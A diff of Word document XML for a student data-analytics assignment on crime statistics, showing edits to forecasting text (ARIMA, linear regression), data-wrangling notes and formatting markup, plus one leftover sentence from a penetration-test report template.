-                      <a:ext cx="4029075" cy="1295400"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-      </w:pPr>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t>Forecasting</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-      </w:pPr>
-      <w:r>
-        <w:t>For forecasting the quantity of crimes and the crime rate, Its necessary to use Machine Learning to predict the number of crime in a given year.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">which model can </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>We</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> use for this</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:rPr>
           <w:lang w:val="en-IE"/>
         </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Symbol" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t></w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  Autoregressive Integrated Moving Average (ARIMA):</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="21"/>
-        </w:numPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>Suitable for univariate time series data with clear trend and seasonality.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="21"/>
-        </w:numPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>Captures past values and forecasting errors to make predictions.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="21"/>
-        </w:numPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>Effective for short-term predictions.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:rPr>
-          <w:lang w:val="en-IE"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-      </w:pPr>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-        </w:rPr>
-        <w:t>Linear regression:</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Linear regression is a simple but powerful model that can be used to predict continuous variables, such as population growth. It works by finding a linear relationship between the population growth and one or more independent variables, such as fertility rates, mortality rates, and migration rates.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:rPr>
-          <w:lang w:val="en-IE"/>
-        </w:rPr>
-      </w:pPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -11760,7 +13406,30 @@
           <w:u w:color="000000"/>
           <w:lang w:val="fr-FR"/>
         </w:rPr>
-        <w:t xml:space="preserve">3.1 Sample Report </w:t>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">3.1 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:b w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:u w:color="000000"/>
+          <w:lang w:val="fr-FR"/>
+        </w:rPr>
+        <w:t>Sample</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:b w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:u w:color="000000"/>
+          <w:lang w:val="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Report </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -11921,7 +13590,31 @@
           <w:u w:color="000000"/>
           <w:lang w:val="fr-FR"/>
         </w:rPr>
-        <w:t xml:space="preserve">3.5 Sample Report </w:t>
+        <w:t xml:space="preserve">3.5 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="None"/>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:b w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:u w:color="000000"/>
+          <w:lang w:val="fr-FR"/>
+        </w:rPr>
+        <w:t>Sample</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="None"/>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:b w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:u w:color="000000"/>
+          <w:lang w:val="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Report </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -11969,6 +13662,7 @@
           <w:rStyle w:val="None"/>
           <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>After the trophies on both the lab network and exam network were completed, John removed all user accounts and passwords as well as the Meterpreter services installed on the system. Offensive Security should not have to remove any user accounts or services from the system.</w:t>
       </w:r>
     </w:p>
@@ -12023,9 +13717,8 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="690EEEA6" wp14:editId="7CE64B57">
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="690EEEA6" wp14:editId="401AA8CD">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
               <wp:posOffset>0</wp:posOffset>
@@ -12048,7 +13741,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId33" cstate="print">
+                    <a:blip r:embed="rId37" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -12079,7 +13772,7 @@
     <w:p/>
     <w:p/>
     <w:sectPr>
-      <w:footerReference w:type="default" r:id="rId34"/>
+      <w:footerReference w:type="default" r:id="rId38"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1134" w:right="1134" w:bottom="1134" w:left="1134" w:header="709" w:footer="709" w:gutter="0"/>
       <w:pgBorders w:offsetFrom="page">
@@ -14702,15 +16395,9 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
-    <w:nsid w:val="648F1753"/>
-    <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="7E446BC4"/>
-    <w:numStyleLink w:val="ImportedStyle1"/>
-  </w:abstractNum>
-  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
-    <w:nsid w:val="65716509"/>
+    <w:nsid w:val="606707C5"/>
     <w:multiLevelType w:val="multilevel"/>
-    <w:tmpl w:val="AE00DACA"/>
+    <w:tmpl w:val="9E56C806"/>
     <w:lvl w:ilvl="0">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
@@ -14856,10 +16543,16 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
+  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="648F1753"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="7E446BC4"/>
+    <w:numStyleLink w:val="ImportedStyle1"/>
+  </w:abstractNum>
   <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
-    <w:nsid w:val="674C097A"/>
+    <w:nsid w:val="65716509"/>
     <w:multiLevelType w:val="multilevel"/>
-    <w:tmpl w:val="9F9468A6"/>
+    <w:tmpl w:val="AE00DACA"/>
     <w:lvl w:ilvl="0">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
@@ -15006,9 +16699,9 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
-    <w:nsid w:val="725D2623"/>
+    <w:nsid w:val="674C097A"/>
     <w:multiLevelType w:val="multilevel"/>
-    <w:tmpl w:val="87A8D2E8"/>
+    <w:tmpl w:val="9F9468A6"/>
     <w:lvl w:ilvl="0">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
@@ -15155,6 +16848,155 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="725D2623"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="87A8D2E8"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7A83416C"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="0AAA7DC0"/>
@@ -15316,7 +17158,7 @@
     <w:abstractNumId w:val="10"/>
   </w:num>
   <w:num w:numId="5" w16cid:durableId="1246454614">
-    <w:abstractNumId w:val="19"/>
+    <w:abstractNumId w:val="20"/>
   </w:num>
   <w:num w:numId="6" w16cid:durableId="1393307185">
     <w:abstractNumId w:val="6"/>
@@ -15331,7 +17173,7 @@
     <w:abstractNumId w:val="12"/>
   </w:num>
   <w:num w:numId="10" w16cid:durableId="1624070426">
-    <w:abstractNumId w:val="16"/>
+    <w:abstractNumId w:val="17"/>
   </w:num>
   <w:num w:numId="11" w16cid:durableId="881406841">
     <w:abstractNumId w:val="1"/>
@@ -15349,13 +17191,13 @@
     <w:abstractNumId w:val="4"/>
   </w:num>
   <w:num w:numId="16" w16cid:durableId="354817324">
-    <w:abstractNumId w:val="18"/>
+    <w:abstractNumId w:val="19"/>
   </w:num>
   <w:num w:numId="17" w16cid:durableId="584535353">
     <w:abstractNumId w:val="8"/>
   </w:num>
   <w:num w:numId="18" w16cid:durableId="378936254">
-    <w:abstractNumId w:val="17"/>
+    <w:abstractNumId w:val="18"/>
   </w:num>
   <w:num w:numId="19" w16cid:durableId="1385257368">
     <w:abstractNumId w:val="2"/>
@@ -15364,7 +17206,10 @@
     <w:abstractNumId w:val="14"/>
   </w:num>
   <w:num w:numId="21" w16cid:durableId="1502046198">
-    <w:abstractNumId w:val="20"/>
+    <w:abstractNumId w:val="21"/>
+  </w:num>
+  <w:num w:numId="22" w16cid:durableId="428621930">
+    <w:abstractNumId w:val="16"/>
   </w:num>
 </w:numbering>
 </file>
@@ -16697,4 +18542,16 @@
     </a:ext>
   </a:extLst>
 </a:theme>
+</file>
+
+<file path=customXml/item1.xml><?xml version="1.0" encoding="utf-8"?>
+<b:Sources xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" SelectedStyle="\APASixthEditionOfficeOnline.xsl" StyleName="APA" Version="6"/>
+</file>
+
+<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{72DEF17F-AFF5-4BAF-812A-BC777141BF64}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
 </file>
--- a/MSC_DA_CA1_Jose_Mario.docx
+++ b/MSC_DA_CA1_Jose_Mario.docx
@@ -307,37 +307,12 @@
                 <w:lang w:val="pt-BR"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:i/>
                 <w:lang w:val="pt-BR"/>
               </w:rPr>
-              <w:t>Bharathi</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:i/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:i/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t>Chakravarthi</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:i/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t>/</w:t>
+              <w:t>Bharathi Chakravarthi/</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -350,17 +325,8 @@
                 <w:i/>
                 <w:lang w:val="pt-BR"/>
               </w:rPr>
-              <w:t xml:space="preserve">Marina </w:t>
+              <w:t>Marina Iantorno</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:i/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t>Iantorno</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -3269,7 +3235,6 @@
                 <w:lang w:eastAsia="en-IE"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
@@ -3278,31 +3243,8 @@
                 <w:szCs w:val="16"/>
                 <w:lang w:eastAsia="en-IE"/>
               </w:rPr>
-              <w:t>Dún</w:t>
+              <w:t>Dún Laoghaire-Rathdown</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-                <w:lang w:eastAsia="en-IE"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> Laoghaire-</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-                <w:lang w:eastAsia="en-IE"/>
-              </w:rPr>
-              <w:t>Rathdown</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -5227,25 +5169,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Data Wrangling is the first step to be performed with the data. This process consists of cleaning, transforming, and manipulating the data to make it more usable for analysis. This process will be performed in a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Jupyter</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Notebook:</w:t>
+        <w:t>Data Wrangling is the first step to be performed with the data. This process consists of cleaning, transforming, and manipulating the data to make it more usable for analysis. This process will be performed in a Jupyter Notebook:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5453,7 +5377,6 @@
         </w:rPr>
         <w:t>“</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5462,7 +5385,6 @@
         </w:rPr>
         <w:t>crime_df</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5479,7 +5401,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5510,16 +5431,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>rame</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>, one</w:t>
+        <w:t>rame, one</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5529,7 +5441,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> ‘</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5538,7 +5449,6 @@
         </w:rPr>
         <w:t>NaN</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5588,53 +5498,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">The </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>method .</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>dropna</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
